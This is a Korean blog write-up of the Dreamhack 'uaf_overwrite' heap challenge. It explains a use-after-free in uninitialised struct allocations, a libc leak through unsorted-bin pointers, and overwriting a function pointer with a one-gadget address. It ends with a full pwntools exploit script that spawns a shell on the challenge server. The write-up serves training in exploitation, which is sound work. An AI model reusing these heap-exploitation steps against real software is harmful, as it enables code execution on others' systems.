uaf_overwr

🌇│System_Study/📕│Dreamhack_Hacking

uaf_overwr

Jastes 2022. 11. 6. 22:50

uaf_overwrite

문제 풀이

모든 보호 기법이 적용되어 있네요.. 와우

Dangling Pointer는 유효하지 않은 메모리 영역을 가리키는 포인터로써.. 코드가 상큼하네요
Dangling Pointer가 있다고 꼭 위험한 부분은 아니지만 경우에 따라 달라지므로 여기선 위험하겠죠

Human이랑 Robot은 구조체로 각 구조체 변수와 크기 동적 할당 해제를 할 수 있습니다

human_func함수와 robot_func 함수를 살펴보면, 구조체 변수를 위한 메모리 영역을 할당 시, 초기화 X

memset()하라는 이야기구나! 라는 걸 한참 뒤에 알겠됬습니다
저는 할당해제하면 알아서 초기화 되는줄 알았는데..

그럼 Human 구조체와 Robot 구조체의 크기는 같으므로, 한 구조체를 해제
다른 구조체를 할당하면 해제된 구조체의 값을 사용할 수 있는 UAF가 발생합니다

robot_func는 생성한 Robot변수의 fptr이 Null이 아니면 이를 호출 UAF로 이 변수 값을 남겨놓는다면
실행 흐름 조작이 가능하겠죠

또 보면 custom_func 함수는 0x100이상의 크기가 힙 청크를 할당 해제할 수 있습니다
마찬가지로 초기화를 안해서 UAF가 발생하겠군요

Exploit 설계

Robot.fptr의 값을 on_gadget의 주소로 덮어서 셸을 획득해야겠습니다
어딜 하나 상관 없겠지만 여기선 Robot.fptr로 하시는군요

코드 취약점이 UAF만 있으므로 libc_leak을 획득해야겠습니다.

함께 학습하기에서 위와 같이 나온 이유는 각 static 함수로 구성된 부분을
넣어주는 함수를 제작 해당 함수를 호출 시 각 함수의 호출 인자를 넣어주겠다는 의미입니다.

여기서 많이 막혔는데.. small bin이상의 크기의 힙 청크를 해제하게 되면
unsorted bin에 들어가게 되고 unsorted bin의 fd, bk에는 보통 main_arena + 88과
같은 main_arena 영역의 주소가 들어갑니다.

그리고 해당 영역은 libc에 있으므로 출력할 수 있다면 leak을 획득할 수 있겠습니다.
보통 해당 심볼을 직접적으로 할 경우 없을 가능성이 농후하므로
__malloc_hook의 심볼을 활용하여 릭을 찾는 방식이 젤 좋은 거 같습니다.

아까 커스텀 함수에서 1번째는 크기 두 번째는 data 즉, 오프셋을 할 데이터의 크기로도
여기선 사용될 수 있습니다. 마지막 -1은 free를 안 하겠다는 의미네요
왜냐하면..

캡처가 짤렸지만.. unsigned int idx로 unsigned로써 -1과 같은 수는 입력하면
형태에서 존재 불가이므로 idx = 0xfffff..라는 양수값으로(1진 보수)if문이 만족 X 고로 free X

이 경우는 lib_base를 구하는 범용적인 코드로써 ASLR이 걸려있을 경우
라이브 주소가 항상 0x00007f로 시작하므로 lic = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))와 일맥상통한 코드로
0x7f부터 6만큼 받아드리고 뒤에 널바이트를 추가해 u64함수로 int값의 형식으로 변환합니다.

참고로 og(one-gadget)의 주소로는 lb + 0x10a41c는 아까 custom의 마지막에 넣었던 B의 offset입니다.
특히 왜 할당을 4번했는가.. 등은 user 가 입력하는 input이 libc leak의 가장 하위 바이트를 덮는다는
특징이 있고, 이런것들이 결합되어 상당히 이해하기 어려운 강의가 되었네요

Exploit

위에서 다 설명했으니 추가적인 부분만 간단히 설명하고 넘어가겠습니다.

마지막으로 이 부분이 추가되어 exploit을 하는데요
human에서 og의 주소를 구했으므로 넣어서 fptr의 부분에 shell을 넣은 모습 그리고
robot을 똑같은 정크로써 넣으므로써 UAF를 발동 실행시킨 모습입니다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31 # Name: uaf_overwrite.py
from pwn import *
p = remote('host3.dreamhack.games', 9794)
#p = process("./uaf_overwrite")
def slog(sym, val): success(sym + ": " + hex(val))
def human(weight, age):
    p.sendlineafter(">", "1")
    p.sendlineafter(": ", str(weight))
    p.sendlineafter(": ", str(age))
def robot(weight):
    p.sendlineafter(">", "2")
    p.sendlineafter(": ", str(weight))
def custom(size, data, idx):
    p.sendlineafter(">", "3")
    p.sendlineafter(": ", str(size))
    p.sendafter(": ", data)
    p.sendlineafter(": ", str(idx))
# UAF to calculate the `libc_base`
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", 0)
custom(0x500, "B", -1)
lb = u64(p.recvline()[:-1].ljust(8, b"\x00")) - 0x3ebc42
og = lb + 0x10a41c
slog("libc_base", lb)
slog("one_gadget", og)
# UAF to manipulate `robot->fptr` & get shell
human("1", og)
robot("1")
p.interactive()
 
Colored by Color Scripter cs

참고 자료

Exploit Tech: Use After Free 강의 설명이 너무 빈약한 것 같습니다..ㅠㅠ

https://dreamhack.io/learn/119#7 해당 강의에서 custom 함수를 통해 라이브러리 주소를 유출하고 Robot, Human에서 uaf를 발생시켜 one_…

dreamhack.io

참고 이미지

저작자표시 비영리 변경금지